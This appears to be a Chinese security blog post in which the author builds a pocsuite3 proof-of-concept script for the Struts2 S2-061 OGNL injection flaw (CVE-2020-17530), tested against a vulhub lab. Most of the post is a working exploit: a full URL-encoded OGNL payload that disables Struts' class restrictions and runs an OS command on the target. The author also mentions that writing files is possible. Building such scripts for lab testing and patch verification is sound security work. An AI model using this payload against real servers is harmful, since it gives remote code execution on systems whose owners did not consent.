struct2-061 PoC编写日记
2020-12-17 15:54:32 Author: www.freebuf.com(查看原文) 阅读量:160 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

简介:

Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大

影响版本:

影响的版本Struts2 : 2.0.0 - 2.5.25

环境搭建:

vulhub项目地址:

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

1608186544_5fdafab0ac55afeed7bf7.png!small?1608186548193

1608186869_5fdafbf5cf223dc267ab2.png!small?1608186873301

burpsuit3检测脚本

# -*- coding:utf-8 -*-

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from urllib.parse import urljoin
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = "CVE-2020-17530"
    version ='Struts2 : 2.0.0 - 2.5.25'
    author = ["H"]
    vulDate = "2020-12-15"
    createDate = "2020-12-15"
    updateDate = "2019-12-15"
    references =["https://vulhub.org/#/environments/struts2/s2-061/"]
    name ="S2-061 Remote Code Execution Vulnerablity"
    appPowerLink = ''
    appName = 'Strute2'
    appVersion = '2.x'
    vulType = 'RCE'
    desc = '''
    struts2-061远程代码执行漏洞
    '''
    samples = []
    install_requires = ['']

    def _verify(self):
        result ={}
        path ="/index.action"
        url = urljoin(self.url, path)
        payload = "id=%0d%0a%25%7b%28%23instancemanager%3d%23application%5b%22org.apache.tomcat.InstanceManager%22%5d%29.%28%23stack%3d%23attr%5b%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5d%29.%28%23bean%3d%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3d%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3d%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3d%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2c%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2c%23emptyset%29%29.%28%23arglist%3d%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22id%22%29%29.%28%23execute%3d%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7d"
        headers = {
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0',
                    'Content-Type': 'application/x-www-form-urlencoded'
                    }
        rr = requests.post(url=url,headers=headers,data=payload)
        try:
            if "uid" in rr.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                #result['VerifyInfo']['Name'] = payload
        except Exception as e:
            pass
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        return self._verify()
register_poc(DemoPOC)

执行验证返回结果

1608187125_5fdafcf5a9372b953ca54.png!small?1608187129077

我这里做了一个简单的判断执行id,看返回包中是否存在。也可以执行写入操作。主要是参考了struct2-053的pocsuit3代码。代码写的不好,有好的想法的大佬可以给个建议

公众号传送门:https://mp.weixin.qq.com/s/yKkMLM1CgU72aUj33LDVJA


文章来源: https://www.freebuf.com/vuls/258112.html
如有侵权请联系:admin#unsafe.sh